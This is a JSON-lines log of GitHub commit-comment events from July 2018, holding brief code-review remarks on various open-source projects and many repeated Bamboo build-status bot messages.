{"id":"7919735594","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598687,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-04T18:38:43Z","updated_at":"2018-07-04T18:38:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:38:43Z"}
{"id":"7919736723","type":"CommitCommentEvent","actor":{"login":"chris-venn"},"repo":{"name":"MariusVenn/soccer-data"},"payload":{"comment":{"id":29598690,"position":null,"line":null,"path":null,"commit_id":"f2737c6d9473ea249af085f8b4ba0e5bd55ef302","created_at":"2018-07-04T18:39:11Z","updated_at":"2018-07-04T18:39:11Z","author_association":"COLLABORATOR","body":"comment test"}},"created_at":"2018-07-04T18:39:11Z"}
{"id":"7919737190","type":"CommitCommentEvent","actor":{"login":"Toflar"},"repo":{"name":"terminal42/contao-autoregistration"},"payload":{"comment":{"id":29598691,"position":1,"line":1,"path":"LICENSE","commit_id":"02f32be187989856e3e44a3aaad9593d5f9669eb","created_at":"2018-07-04T18:39:22Z","updated_at":"2018-07-04T18:39:22Z","author_association":"MEMBER","body":"should be MIT if @richardhj is fine with it. we've released all our new stuff under the MIT license."}},"created_at":"2018-07-04T18:39:22Z"}
{"id":"7919737886","type":"CommitCommentEvent","actor":{"login":"sonwat"},"repo":{"name":"xionbit/ion"},"payload":{"comment":{"id":29598692,"position":null,"line":null,"path":null,"commit_id":"be53807fcc4810a2c29f8e42b1555c7c65740b47","created_at":"2018-07-04T18:39:40Z","updated_at":"2018-07-04T18:39:40Z","author_association":"MEMBER","body":"The commit history was full of spam so i squash merged the files into one commit"}},"created_at":"2018-07-04T18:39:40Z"}
{"id":"7919737992","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598693,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-04T18:39:42Z","updated_at":"2018-07-04T18:39:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:39:42Z"}
{"id":"7919738038","type":"CommitCommentEvent","actor":{"login":"bugan"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29598694,"position":23,"line":23,"path":"Assets/Scritpt/UI/TextoDinamico.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T18:39:43Z","updated_at":"2018-07-04T18:39:43Z","author_association":"OWNER","body":"Pq estou usando esse mesmo componente para mudar o nome do jogador na tela de ranking e a interface de pontuação na tela de jogo"}},"created_at":"2018-07-04T18:39:43Z"}
{"id":"7919738106","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598695,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-04T18:39:45Z","updated_at":"2018-07-04T18:39:45Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:39:45Z"}
{"id":"7919738580","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598697,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-04T18:39:55Z","updated_at":"2018-07-04T18:39:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:39:55Z"}
{"id":"7919739552","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29598701,"position":null,"line":null,"path":null,"commit_id":"d4c0f41e74fc78047569bcc3b5c521fad9020fcb","created_at":"2018-07-04T18:40:19Z","updated_at":"2018-07-04T18:40:19Z","author_association":"NONE","body":"Another idea is that we give a bonus for attacks by our king\r\n```\r\n b = weak & attackedBy[Us][KING];\r\n        if (b)\r\n            score += ThreatByKing[more_than_one(b)];\r\n```\r\n\r\nWhile being there, we could score the weak defences as well\r\n ```\r\nb = weak & attackedBy[Them][KING];\r\n if (b)\r\n      score += DefendedByKing[more_than_one(b)];\r\n```"}},"created_at":"2018-07-04T18:40:19Z"}
{"id":"7919739789","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"coccinelle/coccinelle"},"payload":{"comment":{"id":29598702,"position":20,"line":20,"path":"make-release.sh","commit_id":"f27fe1749884fbd98e468e5f4f3f3d79be388990","created_at":"2018-07-04T18:40:25Z","updated_at":"2018-07-04T18:40:25Z","author_association":"CONTRIBUTOR","body":"How do you think about to [use a here-document for the output of such a multi-line message](https://en.wikipedia.org/wiki/Here_document \"Description for the usage of here-documents\") instead of calling this command so often?"}},"created_at":"2018-07-04T18:40:25Z"}
{"id":"7919740046","type":"CommitCommentEvent","actor":{"login":"RachelMorton102"},"repo":{"name":"RachelMorton102/hello-world2"},"payload":{"comment":{"id":29598703,"position":null,"line":null,"path":null,"commit_id":"7c0378e39abeb9b00493d1572bd3be10b490f814","created_at":"2018-07-04T18:40:30Z","updated_at":"2018-07-04T18:40:30Z","author_association":"OWNER","body":"wow"}},"created_at":"2018-07-04T18:40:30Z"}
{"id":"7919740142","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29598704,"position":112,"line":352,"path":"src/runtime/hexagon_dma.cpp","commit_id":"ed778e73bbf2b71e3a3527c3e3bfbb480d2bdd8a","created_at":"2018-07-04T18:40:32Z","updated_at":"2018-07-04T18:40:32Z","author_association":"NONE","body":"To be consistent with virtual engine, a check need to be do to ensure there is zero real engine associated to it (1:0 check). And then free all the real engines when the last virtual engine is checked for deallocation"}},"created_at":"2018-07-04T18:40:32Z"}
{"id":"7919740961","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598707,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-04T18:40:52Z","updated_at":"2018-07-04T18:40:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:40:52Z"}
{"id":"7919741005","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598708,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-04T18:40:53Z","updated_at":"2018-07-04T18:40:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:40:53Z"}
{"id":"7919741593","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598709,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-04T18:41:06Z","updated_at":"2018-07-04T18:41:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:41:06Z"}
{"id":"7919742255","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598712,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-04T18:41:21Z","updated_at":"2018-07-04T18:41:21Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-04T18:41:21Z"}
{"id":"7919743128","type":"CommitCommentEvent","actor":{"login":"julierennes"},"repo":{"name":"forwards/surveys-public"},"payload":{"comment":{"id":29598715,"position":null,"line":null,"path":null,"commit_id":"cece25d5dded96ddce2ba62854307ffaace2cd29","created_at":"2018-07-04T18:41:41Z","updated_at":"2018-07-04T18:41:41Z","author_association":"MEMBER","body":"Hello, \r\nI think we can remove \" Consider which \r\n-demographics you wish to represent!\" It also means that we will have some kind of biais of selection. I would prefer not encouraging answering only selected questions. "}},"created_at":"2018-07-04T18:41:41Z"}
{"id":"7919743780","type":"CommitCommentEvent","actor":{"login":"mosquedakike"},"repo":{"name":"mosquedakike/pagina-web"},"payload":{"comment":{"id":29598717,"position":null,"line":null,"path":null,"commit_id":"5772a14c89a6b526e0bcfe923c1acac6405d5753","created_at":"2018-07-04T18:41:55Z","updated_at":"2018-07-04T18:41:55Z","author_association":"OWNER","body":"Excelente, que bueno que cambiaste el texto"}},"created_at":"2018-07-04T18:41:55Z"}
{"id":"7919744031","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598718,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-04T18:42:03Z","updated_at":"2018-07-04T18:42:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:42:03Z"}
{"id":"7919744059","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598719,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-04T18:42:03Z","updated_at":"2018-07-04T18:42:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:42:03Z"}
{"id":"7919744649","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598721,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-04T18:42:18Z","updated_at":"2018-07-04T18:42:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:42:18Z"}
{"id":"7919744965","type":"CommitCommentEvent","actor":{"login":"MariusVenn"},"repo":{"name":"MariusVenn/soccer-data"},"payload":{"comment":{"id":29598722,"position":null,"line":null,"path":null,"commit_id":"f2737c6d9473ea249af085f8b4ba0e5bd55ef302","created_at":"2018-07-04T18:42:25Z","updated_at":"2018-07-04T18:42:25Z","author_association":"OWNER","body":"ne ich glaube der code ist nicht gut."}},"created_at":"2018-07-04T18:42:25Z"}
{"id":"7919745857","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29598723,"position":79,"line":326,"path":"src/runtime/hexagon_dma.cpp","commit_id":"ed778e73bbf2b71e3a3527c3e3bfbb480d2bdd8a","created_at":"2018-07-04T18:42:47Z","updated_at":"2018-07-04T18:42:47Z","author_association":"NONE","body":"This is to allocate a virtual engine, may at this time also allocate a real engine and associate to it; since the relationship is 1:N, where N>0 when active"}},"created_at":"2018-07-04T18:42:47Z"}
{"id":"7919746935","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598725,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-04T18:43:12Z","updated_at":"2018-07-04T18:43:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:43:12Z"}
{"id":"7919747001","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598726,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-04T18:43:14Z","updated_at":"2018-07-04T18:43:14Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:43:14Z"}
{"id":"7919747671","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598730,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-04T18:43:31Z","updated_at":"2018-07-04T18:43:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:43:31Z"}
{"id":"7919747788","type":"CommitCommentEvent","actor":{"login":"floelhoeffel"},"repo":{"name":"contentful/extensions"},"payload":{"comment":{"id":29598731,"position":165,"line":125,"path":"README.md","commit_id":"a368f0c51744c38811423b1098aa8bdc8dc2e6d7","created_at":"2018-07-04T18:43:33Z","updated_at":"2018-07-04T18:43:33Z","author_association":"MEMBER","body":"good catch - I ll fix, thanks!"}},"created_at":"2018-07-04T18:43:33Z"}
{"id":"7919749888","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29598733,"position":38,"line":307,"path":"github-dark.css","commit_id":"ba0ce82cbe1087b17d184b3dff3c43249c880f01","created_at":"2018-07-04T18:44:24Z","updated_at":"2018-07-04T18:44:24Z","author_association":"MEMBER","body":"Actually, I just saw you added two declarations, so it's fine."}},"created_at":"2018-07-04T18:44:24Z"}
{"id":"7919751962","type":"CommitCommentEvent","actor":{"login":"PapaJoesSoup"},"repo":{"name":"PapaJoesSoup/BDArmory"},"payload":{"comment":{"id":29598736,"position":null,"line":null,"path":null,"commit_id":"510b6c84805ef63334accb69b8a97ea4889e39ba","created_at":"2018-07-04T18:45:14Z","updated_at":"2018-07-04T18:45:14Z","author_association":"OWNER","body":"This can be replace by changing copy /y to xcopy /e /y"}},"created_at":"2018-07-04T18:45:14Z"}
{"id":"7919753351","type":"CommitCommentEvent","actor":{"login":"anil100391"},"repo":{"name":"Neo-The1/ThinkingTicTacToe"},"payload":{"comment":{"id":29598741,"position":37,"line":35,"path":"deepNeuralNetwork.py","commit_id":"fdcfd443eecf2e1ea19d3bbb8528b7988ec86cbd","created_at":"2018-07-04T18:45:48Z","updated_at":"2018-07-04T18:45:48Z","author_association":"COLLABORATOR","body":"stupidity ;), why not hidden_units = self._layerSizes[1:-1]"}},"created_at":"2018-07-04T18:45:48Z"}
{"id":"7919753493","type":"CommitCommentEvent","actor":{"login":"cactus"},"repo":{"name":"aaronpk/go-camo"},"payload":{"comment":{"id":29598743,"position":10,"line":207,"path":"pkg/camo/proxy.go","commit_id":"577b3a602932a1ac025d3d2d86a4b170f7231062","created_at":"2018-07-04T18:45:50Z","updated_at":"2018-07-04T18:45:50Z","author_association":"NONE","body":"might be safer to change this to:\r\n\r\n```\r\nif !strings.HasPrefix(resp.Header.Get(\"Content-Type\"), \"image/\") && !strings.HasPrefix(resp.Header.Get(\"Content-Type\"), \"video/\") {\r\n    mlog.Debugm(\"Unsupported content-type returned\", mlog.Map{\"type\": u})\r\n    http.Error(w, \"Unsupported content-type returned\",\r\n        http.StatusBadRequest)\r\n    return\r\n}\r\n```\r\n\r\nYou may also want to change line 158 to:\r\n\r\n```\r\n// add an accept header if the client didn't send one\r\nif nreq.Header.Get(\"Accept\") == \"\" {\r\n    nreq.Header.Set(\"Accept\", \"image/*, video/*\")\r\n}\r\n```"}},"created_at":"2018-07-04T18:45:50Z"}
{"id":"7919753968","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29598744,"position":15,"line":888,"path":"LmDataset.py","commit_id":"80d6f6afb59a97eaf1d3e1433af8bfa6144aee09","created_at":"2018-07-04T18:46:01Z","updated_at":"2018-07-04T18:46:01Z","author_association":"MEMBER","body":"The check should better be `self._main_data_key is None`.\r\nDo you use PyCharm? Better use PyCharm, it will automatically tell you such problems."}},"created_at":"2018-07-04T18:46:01Z"}
{"id":"7919754226","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"coccinelle/coccinelle"},"payload":{"comment":{"id":29598747,"position":57,"line":57,"path":"make-release.sh","commit_id":"f27fe1749884fbd98e468e5f4f3f3d79be388990","created_at":"2018-07-04T18:46:08Z","updated_at":"2018-07-04T18:46:08Z","author_association":"CONTRIBUTOR","body":"* This command can be combined with the previous one, can't it?\r\n* How do you think about to improve error detection and corresponding exception handling also for this shell script?"}},"created_at":"2018-07-04T18:46:08Z"}
{"id":"7919757791","type":"CommitCommentEvent","actor":{"login":"ylorenzana"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29598752,"position":4,"line":2,"path":".gitignore","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T18:47:32Z","updated_at":"2018-07-04T18:47:32Z","author_association":"OWNER","body":"Yeah client is still a WIP, I'll push it up once it's ready"}},"created_at":"2018-07-04T18:47:32Z"}
{"id":"7919761200","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"coccinelle/coccinelle"},"payload":{"comment":{"id":29598755,"position":73,"line":73,"path":"make-release.sh","commit_id":"f27fe1749884fbd98e468e5f4f3f3d79be388990","created_at":"2018-07-04T18:48:49Z","updated_at":"2018-07-04T18:48:49Z","author_association":"CONTRIBUTOR","body":"Is it a bit nicer to copy these two files into the target directory by a single command?"}},"created_at":"2018-07-04T18:48:49Z"}
{"id":"7919768718","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29598773,"position":15,"line":15,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"ed778e73bbf2b71e3a3527c3e3bfbb480d2bdd8a","created_at":"2018-07-04T18:51:42Z","updated_at":"2018-07-04T18:51:42Z","author_association":"NONE","body":"indent..."}},"created_at":"2018-07-04T18:51:42Z"}
{"id":"7919776489","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29598787,"position":39,"line":39,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"ed778e73bbf2b71e3a3527c3e3bfbb480d2bdd8a","created_at":"2018-07-04T18:54:49Z","updated_at":"2018-07-04T18:54:49Z","author_association":"NONE","body":"space\r\n// hexagon ..."}},"created_at":"2018-07-04T18:54:49Z"}
{"id":"7919776886","type":"CommitCommentEvent","actor":{"login":"bryant1410"},"repo":{"name":"xmartlabs/bigbang-template"},"payload":{"comment":{"id":29598788,"position":4,"line":5,"path":"app/src/main/java/com/xmartlabs/template/database/AppDataBase.kt","commit_id":"d82ac9ccc984ad040a47a34b0f0eb7450061aead","created_at":"2018-07-04T18:55:00Z","updated_at":"2018-07-04T18:55:00Z","author_association":"MEMBER","body":"It's always useful to add a comment in the TODO, to explain to the future developer what he/she has to do."}},"created_at":"2018-07-04T18:55:00Z"}
{"id":"7919778019","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29598789,"position":6,"line":770,"path":"tests/Makefile.include","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T18:55:26Z","updated_at":"2018-07-04T18:55:26Z","author_association":"NONE","body":"IIRC check-qtest-* adds libqtest object files. Probably you can move qos_set_machines_devices_available, and anything else that needs QMP to the gtest (libqgraph-main.c)."}},"created_at":"2018-07-04T18:55:26Z"}
{"id":"7919779022","type":"CommitCommentEvent","actor":{"login":"jgalar"},"repo":{"name":"compudj/lttng-modules-dev"},"payload":{"comment":{"id":29598793,"position":14,"line":54,"path":"lttng-tracker-id.c","commit_id":"97fd542289048598b207dad9a56dfe3491586258","created_at":"2018-07-04T18:55:52Z","updated_at":"2018-07-04T18:55:52Z","author_association":"NONE","body":"`True if found, False if not found.`"}},"created_at":"2018-07-04T18:55:52Z"}
